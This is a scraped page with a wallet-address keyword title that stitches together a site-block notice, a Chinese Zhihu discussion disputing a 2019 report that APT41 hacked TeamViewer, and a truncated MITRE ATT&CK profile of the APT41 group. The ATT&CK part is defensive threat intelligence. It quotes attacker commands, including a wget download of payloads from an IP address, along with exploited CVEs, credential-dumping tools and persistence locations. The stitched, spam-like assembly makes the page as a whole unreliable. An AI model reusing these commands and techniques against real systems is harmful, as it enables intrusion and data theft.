比特派钱包地址|apt41
作者: 比特派钱包地址
2024-03-07 17:03:43
This site has determined a security issue with your request.
This site has determined a security issue with your request.
We're sorry...
The request has been blocked.
Return to the homepage
如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击? - 知乎
如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击? - 知乎首页知乎知学堂发现等你来答切换模式登录/注册深圳市TeamViewer网络信息安全如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击?[图片] 此次危害如何?普通人应该如何应对?显示全部 关注者290被浏览151,884关注问题写回答邀请回答好问题3 条评论分享44 个回答默认排序云子可信企业 IT 从未如此简单 关注TeamViewer被黑?请冷静的看待整个事件。深圳网警在微博发布《关于TeamViewer客户端被远程控制的紧急通报》,称近期有境外黑客组织APT41对TeamViewer实施了网络攻击,并成功拿下TeamViewer公司的后台管理系统,使得黑客组织可以访问并控制任何安装了TeamViewer的客户端。10.12日深圳网警发布微博 其实早在11日,深圳网警就已经发出通报文件,并在文件中披露事件解决办法,文件截图如下:事件的严重程度是极高的,百科也在第一时间披露了此次事件TeamViewer早已家喻户晓,功能不需要再赘述,这款软件服务于个人用户的同时更多的实际上是面向于企业级用户的,企业用户使用这款软件进行各类远程操作,一旦TeamViewer被攻破,黑客可以随意窃取任意一家使用了TeamViewer作为远程工具的企业信息,一旦企业的机密信息泄露,后果不言而喻,此条信息被各大论坛、门户疯狂转发。各家企业的网络管理员人人自危,一时间TeamViewer的卸载弹窗弹个不停。云子菌从事网络安全行业,对此类事件极其敏感,云子菌记得第一次看到APT41这个所谓黑客组织的名字,是来自美国安全公司火眼的一则新闻,约莫是19年8月的一则新闻,火眼声称APT41一家来自我国的黑客组织,并且自12年起,致力于攻击包括美国、英国和香港等 14 个国家和地区,基于境外对我国的态度,本次攻击事件应当已经在国外炸开了锅,于是云子菌去瞧了瞧。结果是 —— 一切正常。TeamViewer官方并没有出台任何相关安全警告如若出现严重的安全问题,TeamViewer必须提早,提前通知所有用户,这是任何一个企业级产品的安全协议中必然存在的条目,一旦出现安全危机,TeamViewer处理不得当,品牌信誉受损的同时将面临巨额的赔偿。(并不会存在TeamViewer遇到攻击隐藏不报的情况)云子还是不死心,在一些不存在的网站上再次仔细搜索了信息,结果是全部的TeamViewer被攻击信息均来自于深圳网警发布的通报文件。正当云子菌想再次确认深圳网警的那篇通报微博的时候吗,那篇微博竟然找不到了。深圳网警微博深圳网警删除了那篇TeamViewer被攻击的通报微博。云子菌开始怀疑此次攻击事情的真实性,于是再次在国内搜索了有关攻击的信息,云子菌发现,最早的攻击信息来源于twitter的一名博主Christopher Glyer,该博主是美国安全公司火眼的安全架构师。博主截图以下是此博主发布的TeamViewer被攻击信息:博文截图这是仅有的内容Christopher Glyer发布的截图是来自于火眼安全大会上的17张ppt之一,单凭本张ppt并不能确认TeamViewer就是被黑了,且Christopher Glyer并没有回应其他twitter博主的疑问,并以不能透露受害人信息为由,拒绝透露任何相关信息。火眼向来不是一家好名声的安全公司,按照火眼以往一贯的作风,云子推测,此次事件极大可能是火眼安全为了炒作自家安全产品放出的一则迷惑性新闻,深圳网警错误的理解了这个信息,结果是闹了个大乌龙。愿大家都能冷静的看待突发事件。云子也推荐下自家的远程产品,云子可信终端管理软件,有兴趣的同学可以进官网了解详情。编辑于 2019-12-16 17:32赞同 18036 条评论分享收藏喜欢收起火绒安全已认证账号 关注在11日FireEye公司举办的安全会上,有演讲的PPT以照片形式被他人公布出来,并配以 “TeamViewer曾经被黑客组织APT41入侵过,且该组织可以访问任何安装TeamViewer系统”的文字,引发关注。火绒也收到不少用户的询问,我们对整个事件做了了解后,将情况做了大致的梳理。火绒工程师根据网传的照片找到FireEye的报告(如下图),发现照片的转发语和FireEye实际的PPT表达内容不相符:1、从FireEye的报告来看,他们并没有掌握直接证据表明APT41入侵TeamViewer公司。网传照片中是仅显示FireEye发现在 2017-2018年期间,有APT41利用TeamViewer的登录凭证登陆被攻击主机的行为。2、根据FireEye的PPT中显示,TeamViewer公司在 2016年被黑客入侵过(由其它媒体报道过)。而当时TeamViewer也回应过入侵事件,并表示未发现泄露数据的证据。总结:从现有信息来看无论是时间还是逻辑上,FireEye发现的2017-2018“利用TeamViewer的登录凭证”与TeamViewer2016年被攻击的事件没有必然的联系,也无从证明TeamViewer近期被攻击并访问用户系统。因此,TeamViewer用户也无须过分担心,火绒会持续关注此事件的发展。安全建议:1、远程控制类软件在需要时打开,避免有潜在漏洞被黑客利用的风险;2、关注软件厂商对软件发布的修复公告,保持软件及时更新;3、对于火绒企业版的用户,可使用“火绒企业版”-“远程桌面”代替使用。最后,火绒也会持续关注此事件的发展,随时跟进更多相关信息。发布于 2019-10-12 17:42赞同 12510 条评论分享收藏喜欢
APT41, Wicked Panda, Group G0096 | MITRE ATT&CK®
APT41, Wicked Panda, Group G0096 | MITRE ATT&CK®
Matrices
Enterprise
Mobile
ICS
Tactics
Enterprise
Mobile
ICS
Techniques
Enterprise
Mobile
ICS
Defenses
Data Sources
Mitigations
Enterprise
Mobile
ICS
Assets
CTI
Groups
Software
Campaigns
Resources
Get Started
Learn More about ATT&CK
ATT&CK Data & Tools
FAQ
Engage with ATT&CK
Version History
Legal & Branding
Benefactors
Blog
Search
Thank you to SOC Prime for becoming ATT&CK's first Benefactor. To join them, or learn more about this program visit our Benefactors page.
Home
Groups
APT41
APT41
APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]
ID: G0096
ⓘ
Associated Groups: Wicked Panda
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 3.1
Created: 23 September 2019
Last Modified: 23 March 2023
Version Permalink
Live Version
Associated Group Descriptions
Name
Description
Wicked Panda
[3]
Campaigns
ID
Name
First Seen
Last Seen
References
Techniques
C0017
C0017
May 2021 [4]
February 2022 [4]
[4]
Access Token Manipulation,
Application Layer Protocol: Web Protocols,
Archive Collected Data: Archive via Custom Method,
Command and Scripting Interpreter: JavaScript,
Command and Scripting Interpreter: Windows Command Shell,
Data from Local System,
Data Obfuscation: Protocol Impersonation,
Data Staged: Local Data Staging,
Deobfuscate/Decode Files or Information,
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Exfiltration Over C2 Channel,
Exfiltration Over Web Service,
Exploit Public-Facing Application,
Exploitation for Privilege Escalation,
Hijack Execution Flow,
Ingress Tool Transfer,
Masquerading: Masquerade Task or Service,
Masquerading: Match Legitimate Name or Location,
Obfuscated Files or Information: Software Packing,
Obfuscated Files or Information,
Obtain Capabilities: Tool,
OS Credential Dumping: Security Account Manager,
Proxy,
Scheduled Task/Job: Scheduled Task,
Server Software Component: Web Shell,
System Information Discovery,
System Network Configuration Discovery,
System Owner/User Discovery,
Web Service: Dead Drop Resolver,
Web Service
ATT&CK® Navigator Layers
Enterprise Layer
download
view
Techniques Used
Domain
ID
Name
Use
Enterprise
T1134
Access Token Manipulation
During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[4]
Enterprise
T1098
Account Manipulation
APT41 has added user accounts to the User and Admin groups.[1]
Enterprise
T1071
.001
Application Layer Protocol: Web Protocols
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[5] During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[4]
.002
Application Layer Protocol: File Transfer Protocols
APT41 used exploit payloads that initiate download via ftp.[5]
.004
Application Layer Protocol: DNS
APT41 used DNS for C2 communications.[1][2]
Enterprise
T1560
.001
Archive Collected Data: Archive via Utility
APT41 created a RAR archive of targeted files for exfiltration.[1]
.003
Archive Collected Data: Archive via Custom Method
During C0017, APT41 hex-encoded PII data prior to exfiltration.[4]
Enterprise
T1197
BITS Jobs
APT41 used BITSAdmin to download and install payloads.[5][3]
Enterprise
T1547
.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[5]
Enterprise
T1110
.002
Brute Force: Password Cracking
APT41 performed password brute-force attacks on the local admin account.[1]
Enterprise
T1059
.001
Command and Scripting Interpreter: PowerShell
APT41 leveraged PowerShell to deploy malware families in victims’ environments.[1][5]
.003
Command and Scripting Interpreter: Windows Command Shell
APT41 used cmd.exe /c to execute commands on remote machines.[1]APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[5]During C0017, APT41 used cmd.exe to execute reconnaissance commands.[4]
.004
Command and Scripting Interpreter: Unix Shell
APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.[5]
.007
Command and Scripting Interpreter: JavaScript
During C0017, APT41 deployed JScript web shells on compromised systems.[4]
Enterprise
T1136
.001
Create Account: Local Account
APT41 has created user accounts.[1]
Enterprise
T1543
.003
Create or Modify System Process: Windows Service
APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[5]
Enterprise
T1486
Data Encrypted for Impact
APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1]
Enterprise
T1005
Data from Local System
APT41 has uploaded files and data from a compromised host.[2]During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[4]
Enterprise
T1001
.003
Data Obfuscation: Protocol Impersonation
During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[4]
Enterprise
T1074
.001
Data Staged: Local Data Staging
During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[4]
Enterprise
T1140
Deobfuscate/Decode Files or Information
During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[4]
Enterprise
T1568
.002
Dynamic Resolution: Domain Generation Algorithms
APT41 has used DGAs to change their C2 servers monthly.[1]
Enterprise
T1546
.008
Event Triggered Execution: Accessibility Features
APT41 leveraged sticky keys to establish persistence.[1]
Enterprise
T1480
.001
Execution Guardrails: Environmental Keying
APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[6]
Enterprise
T1048
.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[4]
Enterprise
T1041
Exfiltration Over C2 Channel
During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[4]
Enterprise
T1567
Exfiltration Over Web Service
During C0017, APT41 used Cloudflare services for data exfiltration.[4]
Enterprise
T1190
Exploit Public-Facing Application
APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[5]During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[4]
Enterprise
T1203
Exploitation for Client Execution
APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1]
Enterprise
T1068
Exploitation for Privilege Escalation
During C0017, APT41 abused named pipe impersonation for privilege escalation.[4]
Enterprise
T1133
External Remote Services
APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1]
Enterprise
T1008
Fallback Channels
APT41 used the Steam community page as a fallback mechanism for C2.[1]
Enterprise
T1083
File and Directory Discovery
APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[5]
Enterprise
T1574
.001
Hijack Execution Flow: DLL Search Order Hijacking
APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3]
.002
Hijack Execution Flow: DLL Side-Loading
APT41 used legitimate executables to perform DLL side-loading of their malware.[1]
.006
Hijack Execution Flow: Dynamic Linker Hijacking
APT41 has configured payloads to load via LD_PRELOAD.[3]
Enterprise
T1070
.001
Indicator Removal: Clear Windows Event Logs
APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[1]
.003
Indicator Removal: Clear Command History
APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1]
.004
Indicator Removal: File Deletion
APT41 deleted files from the system.[1]
Enterprise
T1105
Ingress Tool Transfer
APT41 used certutil to download additional files.[5][3][2]During C0017, APT41 downloaded malicious payloads onto compromised systems.[4]
Enterprise
T1056
.001
Input Capture: Keylogging
APT41 used a keylogger called GEARSHIFT on a target system.[1]
Enterprise
T1036
.004
Masquerading: Masquerade Task or Service
APT41 has created services to appear as benign system tools.[2]During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[4]
.005
Masquerading: Match Legitimate Name or Location
APT41 attempted to masquerade their files as popular anti-virus software.[1][2]During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[4]
Enterprise
T1112
Modify Registry
APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2]
Enterprise
T1104
Multi-Stage Channels
APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[5]
Enterprise
T1046
Network Service Discovery
APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1]
Enterprise
T1135
Network Share Discovery
APT41 used the net share command as part of network reconnaissance.[1][2]
Enterprise
T1027
Obfuscated Files or Information
APT41 used VMProtected binaries in multiple intrusions.[5]During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[4]
.002
Software Packing
During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[4]
Enterprise
T1588
.002
Obtain Capabilities: Tool
APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1]For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[4]
Enterprise
T1003
.001
OS Credential Dumping: LSASS Memory
APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2]
.002
OS Credential Dumping: Security Account Manager
During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[4]
Enterprise
T1566
.001
Phishing: Spearphishing Attachment
APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1]
Enterprise
T1542
.003
Pre-OS Boot: Bootkit
APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1]
Enterprise
T1055
Process Injection
APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1]
Enterprise
T1090
Proxy
APT41 used a tool called CLASSFON to covertly proxy network communications.[1]During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[4]
Enterprise
T1021
.001
Remote Services: Remote Desktop Protocol
APT41 used RDP for lateral movement.[1][3]
.002
Remote Services: SMB/Windows Admin Shares
APT41 has transferred implant files using Windows Admin Shares.[3]
Enterprise
T1496
Resource Hijacking
APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[1]
Enterprise
T1014
Rootkit
APT41 deployed rootkits on Linux systems.[1][3]
Enterprise
T1053
.005
Scheduled Task/Job: Scheduled Task
APT41 used a compromised account to create a scheduled task on a system.[1][3]During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[4]
Enterprise
T1505
.003
Server Software Component: Web Shell
During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[4]
Enterprise
T1553
.002
Subvert Trust Controls: Code Signing
APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2]
Enterprise
T1195
.002
Supply Chain Compromise: Compromise Software Supply Chain
APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1]
Enterprise
T1218
.001
System Binary Proxy Execution: Compiled HTML File
APT41 used compiled HTML (.chm) files for targeting.[1]
.011
System Binary Proxy Execution: Rundll32
APT41 has used rundll32.exe to execute a loader.[3]
Enterprise
T1082
System Information Discovery
During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[4]
Enterprise
T1016
System Network Configuration Discovery
APT41 collected MAC addresses from victim machines.[1][2] During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[4]
Enterprise
T1049
System Network Connections Discovery
APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[1][2]
Enterprise
T1033
System Owner/User Discovery
APT41 used the WMIEXEC utility to execute whoami commands on remote machines.[1]During C0017, APT41 used whoami to gather information from victim machines.[4]
Enterprise
T1569
.002
System Services: Service Execution
APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[5][2]
Enterprise
T1078
Valid Accounts
APT41 used compromised credentials to log on to other systems.[1][3]
Enterprise
T1102
.001
Web Service: Dead Drop Resolver
APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1]During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[4]
Enterprise
T1047
Windows Management Instrumentation
APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2]
Software
ID
Name
References
Techniques
S0073
ASPXSpy
[1]
Server Software Component: Web Shell
S0190
BITSAdmin
[5]
BITS Jobs,
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Ingress Tool Transfer,
Lateral Tool Transfer
S0069
BLACKCOFFEE
[1]
Command and Scripting Interpreter: Windows Command Shell,
File and Directory Discovery,
Indicator Removal: File Deletion,
Multi-Stage Channels,
Process Discovery,
Web Service: Dead Drop Resolver,
Web Service: Bidirectional Communication
S0160
certutil
[5]
Archive Collected Data: Archive via Utility,
Deobfuscate/Decode Files or Information,
Ingress Tool Transfer,
Subvert Trust Controls: Install Root Certificate
S0020
China Chopper
[1]
Application Layer Protocol: Web Protocols,
Brute Force: Password Guessing,
Command and Scripting Interpreter: Windows Command Shell,
Data from Local System,
File and Directory Discovery,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Network Service Discovery,
Obfuscated Files or Information: Software Packing,
Server Software Component: Web Shell
S0154
Cobalt Strike
[5][2]
Abuse Elevation Control Mechanism: Sudo and Sudo Caching,
Abuse Elevation Control Mechanism: Bypass User Account Control,
Access Token Manipulation: Parent PID Spoofing,
Access Token Manipulation: Token Impersonation/Theft,
Access Token Manipulation: Make and Impersonate Token,
Account Discovery: Domain Account,
Application Layer Protocol: DNS,
Application Layer Protocol: Web Protocols,
Application Layer Protocol: File Transfer Protocols,
BITS Jobs,
Browser Session Hijacking,
Command and Scripting Interpreter: JavaScript,
Command and Scripting Interpreter: Visual Basic,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Python,
Command and Scripting Interpreter: Windows Command Shell,
Create or Modify System Process: Windows Service,
Data Encoding: Standard Encoding,
Data from Local System,
Data Obfuscation: Protocol Impersonation,
Data Transfer Size Limits,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Asymmetric Cryptography,
Encrypted Channel: Symmetric Cryptography,
Exploitation for Client Execution,
Exploitation for Privilege Escalation,
File and Directory Discovery,
Hide Artifacts: Process Argument Spoofing,
Impair Defenses: Disable or Modify Tools,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Network Service Discovery,
Network Share Discovery,
Non-Application Layer Protocol,
Obfuscated Files or Information: Indicator Removal from Tools,
Obfuscated Files or Information,
Office Application Startup: Office Template Macros,
OS Credential Dumping: LSASS Memory,
OS Credential Dumping: Security Account Manager,
Permission Groups Discovery: Domain Groups,
Permission Groups Discovery: Local Groups,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Process Injection: Process Hollowing,
Process Injection,
Protocol Tunneling,
Proxy: Domain Fronting,
Proxy: Internal Proxy,
Query Registry,
Reflective Code Loading,
Remote Services: Remote Desktop Protocol,
Remote Services: SSH,
Remote Services: Windows Remote Management,
Remote Services: SMB/Windows Admin Shares,
Remote Services: Distributed Component Object Model,
Remote System Discovery,
Scheduled Transfer,
Screen Capture,
Software Discovery,
Subvert Trust Controls: Code Signing,
System Binary Proxy Execution: Rundll32,
System Network Configuration Discovery,
System Network Connections Discovery,
System Service Discovery,
System Services: Service Execution,
Use Alternate Authentication Material: Pass the Hash,
Valid Accounts: Domain Accounts,
Valid Accounts: Local Accounts,
Windows Management Instrumentation
S1052
DEADEYE
[4]
Command and Scripting Interpreter: Windows Command Shell,
Deobfuscate/Decode Files or Information,
Execution Guardrails,
Hide Artifacts: NTFS File Attributes,
Masquerading: Masquerade Task or Service,
Native API,
Obfuscated Files or Information,
Obfuscated Files or Information: Embedded Payloads,
Scheduled Task/Job,
System Binary Proxy Execution: Msiexec,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Network Configuration Discovery
S0021
Derusbi
[1]
Audio Capture,
Command and Scripting Interpreter: Unix Shell,
Encrypted Channel: Symmetric Cryptography,
Fallback Channels,
File and Directory Discovery,
Indicator Removal: Timestomp,
Indicator Removal: File Deletion,
Input Capture: Keylogging,
Non-Application Layer Protocol,
Non-Standard Port,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Query Registry,
Screen Capture,
System Binary Proxy Execution: Regsvr32,
System Information Discovery,
System Owner/User Discovery,
Video Capture
S0105
dsquery
[4]
Account Discovery: Domain Account,
Domain Trust Discovery,
Permission Groups Discovery: Domain Groups,
System Information Discovery
S0363
Empire
[3]
Abuse Elevation Control Mechanism: Bypass User Account Control,
Access Token Manipulation: SID-History Injection,
Access Token Manipulation,
Access Token Manipulation: Create Process with Token,
Account Discovery: Domain Account,
Account Discovery: Local Account,
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,
Application Layer Protocol: Web Protocols,
Archive Collected Data,
Automated Collection,
Automated Exfiltration,
Boot or Logon Autostart Execution: Security Support Provider,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Boot or Logon Autostart Execution: Shortcut Modification,
Browser Information Discovery,
Clipboard Data,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Windows Command Shell,
Command and Scripting Interpreter,
Create Account: Local Account,
Create Account: Domain Account,
Create or Modify System Process: Windows Service,
Credentials from Password Stores: Credentials from Web Browsers,
Domain Policy Modification: Group Policy Modification,
Domain Trust Discovery,
Email Collection: Local Email Collection,
Encrypted Channel: Asymmetric Cryptography,
Event Triggered Execution: Accessibility Features,
Exfiltration Over C2 Channel,
Exfiltration Over Web Service: Exfiltration to Code Repository,
Exfiltration Over Web Service: Exfiltration to Cloud Storage,
Exploitation for Privilege Escalation,
Exploitation of Remote Services,
File and Directory Discovery,
Group Policy Discovery,
Hijack Execution Flow: Path Interception by Unquoted Path,
Hijack Execution Flow: Path Interception by Search Order Hijacking,
Hijack Execution Flow: Path Interception by PATH Environment Variable,
Hijack Execution Flow: Dylib Hijacking,
Hijack Execution Flow: DLL Search Order Hijacking,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Input Capture: Keylogging,
Input Capture: Credential API Hooking,
Native API,
Network Service Discovery,
Network Share Discovery,
Network Sniffing,
Obfuscated Files or Information: Command Obfuscation,
OS Credential Dumping: LSASS Memory,
Process Discovery,
Process Injection,
Remote Services: Distributed Component Object Model,
Remote Services: SSH,
Scheduled Task/Job: Scheduled Task,
Screen Capture,
Software Discovery: Security Software Discovery,
Steal or Forge Kerberos Tickets: Kerberoasting,
Steal or Forge Kerberos Tickets: Golden Ticket,
Steal or Forge Kerberos Tickets: Silver Ticket,
System Information Discovery,
System Network Configuration Discovery,
System Network Connections Discovery,
System Owner/User Discovery,
System Services: Service Execution,
Trusted Developer Utilities Proxy Execution: MSBuild,
Unsecured Credentials: Credentials In Files,
Unsecured Credentials: Private Keys,
Use Alternate Authentication Material: Pass the Hash,
Video Capture,
Web Service: Bidirectional Communication,
Windows Management Instrumentation
S0095
ftp
[5]
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Ingress Tool Transfer,
Lateral Tool Transfer
S0032
gh0st RAT
[1]
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter,
Create or Modify System Process: Windows Service,
Data Encoding: Standard Encoding,
Deobfuscate/Decode Files or Information,
Dynamic Resolution: Fast Flux DNS,
Encrypted Channel: Symmetric Cryptography,
Encrypted Channel,
Hijack Execution Flow: DLL Side-Loading,
Indicator Removal: Clear Windows Event Logs,
Indicator Removal: File Deletion,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Non-Application Layer Protocol,
Process Discovery,
Process Injection,
Query Registry,
Screen Capture,
Shared Modules,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Services: Service Execution
S0100
ipconfig
[2]
System Network Configuration Discovery
S1051
KEYPLUG
[4]
Application Layer Protocol: Web Protocols,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Asymmetric Cryptography,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Proxy,
System Time Discovery,
Web Service: Dead Drop Resolver
S0443
MESSAGETAP
[7][3]
Archive Collected Data: Archive via Custom Method,
Automated Collection,
Data Staged: Local Data Staging,
Deobfuscate/Decode Files or Information,
File and Directory Discovery,
Indicator Removal: File Deletion,
Network Sniffing,
System Network Connections Discovery
S0002
Mimikatz
[1][2]
Access Token Manipulation: SID-History Injection,
Account Manipulation,
Boot or Logon Autostart Execution: Security Support Provider,
Credentials from Password Stores,
Credentials from Password Stores: Credentials from Web Browsers,
Credentials from Password Stores: Windows Credential Manager,
OS Credential Dumping: DCSync,
OS Credential Dumping: Security Account Manager,
OS Credential Dumping: LSASS Memory,
OS Credential Dumping: LSA Secrets,
Rogue Domain Controller,
Steal or Forge Authentication Certificates,
Steal or Forge Kerberos Tickets: Golden Ticket,
Steal or Forge Kerberos Tickets: Silver Ticket,
Unsecured Credentials: Private Keys,
Use Alternate Authentication Material: Pass the Hash,
Use Alternate Authentication Material: Pass the Ticket
S0039
Net
[1]
Account Discovery: Domain Account,
Account Discovery: Local Account,
Create Account: Local Account,
Create Account: Domain Account,
Indicator Removal: Network Share Connection Removal,
Network Share Discovery,
Password Policy Discovery,
Permission Groups Discovery: Domain Groups,
Permission Groups Discovery: Local Groups,
Remote Services: SMB/Windows Admin Shares,
Remote System Discovery,
System Network Connections Discovery,
System Service Discovery,
System Services: Service Execution,
System Time Discovery
S0104
netstat
[1]
System Network Connections Discovery
S0385
njRAT
[1]
Application Layer Protocol: Web Protocols,
Application Window Discovery,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Windows Command Shell,
Credentials from Password Stores: Credentials from Web Browsers,
Data Encoding: Standard Encoding,
Data from Local System,
Dynamic Resolution: Fast Flux DNS,
Exfiltration Over C2 Channel,
File and Directory Discovery,
Impair Defenses: Disable or Modify System Firewall,
Indicator Removal: File Deletion,
Indicator Removal: Clear Persistence,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Non-Standard Port,
Obfuscated Files or Information,
Obfuscated Files or Information: Compile After Delivery,
Peripheral Device Discovery,
Process Discovery,
Query Registry,
Remote Services: Remote Desktop Protocol,
Remote System Discovery,
Replication Through Removable Media,
Screen Capture,
System Information Discovery,
System Owner/User Discovery,
Video Capture
S0097
Ping
[1][2]
Remote System Discovery
S0013
PlugX
[1]
Application Layer Protocol: Web Protocols,
Application Layer Protocol: DNS,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter: Windows Command Shell,
Create or Modify System Process: Windows Service,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Symmetric Cryptography,
File and Directory Discovery,
Hide Artifacts: Hidden Files and Directories,
Hijack Execution Flow: DLL Side-Loading,
Hijack Execution Flow: DLL Search Order Hijacking,
Ingress Tool Transfer,
Input Capture: Keylogging,
Masquerading: Masquerade Task or Service,
Masquerading: Match Legitimate Name or Location,
Modify Registry,
Native API,
Network Share Discovery,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Process Discovery,
Query Registry,
Screen Capture,
System Network Connections Discovery,
Trusted Developer Utilities Proxy Execution: MSBuild,
Virtualization/Sandbox Evasion: System Checks,
Web Service: Dead Drop Resolver
S0194
PowerSploit
[1]
Access Token Manipulation,
Account Discovery: Local Account,
Audio Capture,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Boot or Logon Autostart Execution: Security Support Provider,
Command and Scripting Interpreter: PowerShell,
Create or Modify System Process: Windows Service,
Credentials from Password Stores: Windows Credential Manager,
Data from Local System,
Domain Trust Discovery,
Hijack Execution Flow: Path Interception by PATH Environment Variable,
Hijack Execution Flow: Path Interception by Unquoted Path,
Hijack Execution Flow: DLL Search Order Hijacking,
Hijack Execution Flow: Path Interception by Search Order Hijacking,
Input Capture: Keylogging,
Obfuscated Files or Information: Indicator Removal from Tools,
